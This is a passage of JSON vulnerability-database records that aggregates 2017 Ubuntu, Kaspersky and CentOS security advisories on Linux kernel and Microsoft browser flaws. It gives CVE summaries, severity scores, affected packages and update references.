an sg device could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-7187)\n\nEric Biggers discovered a memory leak in the keyring implementation in the Linux kernel. A local attacker could use this to cause a denial of service (memory consumption). (CVE-2017-7472)\n\nIt was discovered that a buffer overflow existed in the Broadcom FullMAC WLAN driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-7541)", "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "USN-3422-2", "href": "https://usn.ubuntu.com/3422-2/", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:13", "bulletinFamily": "unix", "description": "It was discovered that a buffer overflow existed in the Bluetooth stack of the Linux kernel when handling L2CAP configuration responses. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2017-1000251)\n\nIt was discovered that the asynchronous I/O (aio) subsystem of the Linux kernel did not properly set permissions on aio memory mappings in some situations. An attacker could use this to more easily exploit other vulnerabilities. (CVE-2016-10044)\n\nBaozeng Ding and Andrey Konovalov discovered a race condition in the L2TPv3 IP Encapsulation implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-10200)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem implementation in the Linux kernel did not clear the setgid bit during a setxattr call. A local attacker could use this to possibly elevate group privileges. (CVE-2016-7097)\n\nSergej Schumilo, Ralf Spenneberg, and Hendrik Schwartke discovered that the key management subsystem in the Linux kernel did not properly allocate memory in some situations. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-8650)\n\nVlad Tsyrklevich discovered an integer overflow vulnerability in the VFIO PCI driver for the Linux kernel. A local attacker with access to a vfio PCI device file could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-9083, CVE-2016-9084)\n\nIt was discovered that an information leak existed in __get_user_asm_ex() in the Linux kernel. A local attacker could use this to expose sensitive information. (CVE-2016-9178)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel did not properly perform reference counting in some situations. An unprivileged attacker could use this to cause a denial of service (system hang). (CVE-2016-9191)\n\nIt was discovered that the keyring implementation in the Linux kernel in some situations did not prevent special internal keyrings from being joined by userspace keyrings. A privileged local attacker could use this to bypass module verification. (CVE-2016-9604)\n\nIt was discovered that an integer overflow existed in the trace subsystem of the Linux kernel. A local privileged attacker could use this to cause a denial of service (system crash). (CVE-2016-9754)\n\nAndrey Konovalov discovered that the IPv4 implementation in the Linux kernel did not properly handle invalid IP options in some situations. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2017-5970)\n\nDmitry Vyukov discovered that the Linux kernel did not properly handle TCP packets with the URG flag. A remote attacker could use this to cause a denial of service. (CVE-2017-6214)\n\nIt was discovered that a race condition existed in the AF_PACKET handling code in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-6346)\n\nIt was discovered that the keyring implementation in the Linux kernel did not properly restrict searches for dead keys. A local attacker could use this to cause a denial of service (system crash). (CVE-2017-6951)\n\nDmitry Vyukov discovered that the generic SCSI (sg) subsystem in the Linux kernel contained a stack-based buffer overflow. A local attacker with access to an sg device could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-7187)\n\nEric Biggers discovered a memory leak in the keyring implementation in the Linux kernel. A local attacker could use this to cause a denial of service (memory consumption). (CVE-2017-7472)\n\nIt was discovered that a buffer overflow existed in the Broadcom FullMAC WLAN driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2017-7541)", "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "USN-3422-1", "href": "https://usn.ubuntu.com/3422-1/", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:17", "bulletinFamily": "info", "description": "### *Detect date*:\n08/08/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Internet Explorer and Microsoft Edge. Malicious users can exploit these vulnerabilities to gain privileges, bypass security restrictions, execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Internet Explorer versions 9 through 11 \nMicrosoft Edge\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8647>) \n[CVE-2017-8646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8646>) \n[CVE-2017-8645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8645>) \n[CVE-2017-8644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8644>) \n[CVE-2017-8625](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625>) \n[CVE-2017-8642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8642>) \n[CVE-2017-8641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8641>) \n[CVE-2017-8640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8640>) \n[CVE-2017-8669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8669>) \n[CVE-2017-8661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8661>) \n[CVE-2017-8662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8662>) \n[CVE-2017-8503](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8503>) \n[CVE-2017-8638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8638>) \n[CVE-2017-8639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8639>) \n[CVE-2017-8636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8636>) \n[CVE-2017-8637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8637>) \n[CVE-2017-8634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8634>) \n[CVE-2017-8635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8635>) \n[CVE-2017-8655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8655>) \n[CVE-2017-8656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8656>) \n[CVE-2017-8657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8657>) \n[CVE-2017-8650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8650>) \n[CVE-2017-8651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8651>) \n[CVE-2017-8652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8652>) \n[CVE-2017-8653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8653>) \n[CVE-2017-8672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8672>) \n[CVE-2017-8670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8670>) \n[CVE-2017-8671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8671>) \n[CVE-2017-8659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8659>) \n[CVE-2017-8674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8674>) \n[CVE-2017-8503](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8503>) \n[CVE-2017-8634](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8634>) \n[CVE-2017-8635](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8635>) \n[CVE-2017-8636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8636>) \n[CVE-2017-8637](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8637>) \n[CVE-2017-8638](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8638>) \n[CVE-2017-8639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8639>) \n[CVE-2017-8640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8640>) \n[CVE-2017-8641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8641>) \n[CVE-2017-8642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8642>) \n[CVE-2017-8644](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8644>) \n[CVE-2017-8645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8645>) \n[CVE-2017-8646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8646>) \n[CVE-2017-8647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8647>) \n[CVE-2017-8651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8651>) \n[CVE-2017-8652](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8652>) \n[CVE-2017-8653](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8653>) \n[CVE-2017-8655](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8655>) \n[CVE-2017-8656](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8656>) \n[CVE-2017-8657](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8657>) \n[CVE-2017-8659](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8659>) \n[CVE-2017-8661](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8661>) \n[CVE-2017-8662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8662>) \n[CVE-2017-8669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8669>) \n[CVE-2017-8670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8670>) \n[CVE-2017-8671](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8671>) \n[CVE-2017-8672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8672>) \n[CVE-2017-8674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8674>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8503](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8503>)4.6Critical \n[CVE-2017-8625](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8625>)6.8Critical \n[CVE-2017-8634](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8634>)7.6Critical \n[CVE-2017-8635](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8635>)7.6Critical \n[CVE-2017-8636](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8636>)7.6Critical \n[CVE-2017-8637](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8637>)2.6Critical \n[CVE-2017-8638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8638>)7.6Critical \n[CVE-2017-8639](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8639>)7.6Critical \n[CVE-2017-8640](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8640>)7.6Critical \n[CVE-2017-8641](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8641>)7.6Critical \n[CVE-2017-8642](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8642>)4.3Critical \n[CVE-2017-8644](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8644>)4.3Critical \n[CVE-2017-8645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8645>)7.6Critical \n[CVE-2017-8646](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8646>)7.6Critical \n[CVE-2017-8647](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8647>)7.6Critical \n[CVE-2017-8650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8650>)5.8Critical \n[CVE-2017-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8651>)7.6Critical \n[CVE-2017-8652](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8652>)4.3Critical \n[CVE-2017-8653](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8653>)7.6Critical \n[CVE-2017-8655](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8655>)7.6Critical \n[CVE-2017-8656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8656>)7.6Critical \n[CVE-2017-8657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8657>)7.6Critical \n[CVE-2017-8659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8659>)4.3Critical \n[CVE-2017-8661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8661>)7.6Critical \n[CVE-2017-8662](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8662>)4.3Critical \n[CVE-2017-8669](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8669>)7.6Critical \n[CVE-2017-8670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8670>)7.6Critical \n[CVE-2017-8671](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8671>)7.6Critical \n[CVE-2017-8672](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8672>)7.6Critical \n[CVE-2017-8674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8674>)7.6Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4034668](<http://support.microsoft.com/kb/4034668>) \n[4034733](<http://support.microsoft.com/kb/4034733>) \n[4034674](<http://support.microsoft.com/kb/4034674>) \n[4034681](<http://support.microsoft.com/kb/4034681>) \n[4034658](<http://support.microsoft.com/kb/4034658>) \n[4034660](<http://support.microsoft.com/kb/4034660>) \n[4034665](<http://support.microsoft.com/kb/4034665>) \n[4034664](<http://support.microsoft.com/kb/4034664>)", "modified": "2019-03-07T00:00:00", "published": "2017-08-08T00:00:00", "id": "KLA11084", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11084", "title": "\r KLA11084Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-05-29T18:34:26", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2017:0933\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/022385.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0933.html", "modified": "2017-04-13T11:00:48", "published": "2017-04-13T11:00:48", "href": "http://lists.centos.org/pipermail/centos-announce/2017-April/022385.html", "id": "CESA-2017:0933", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
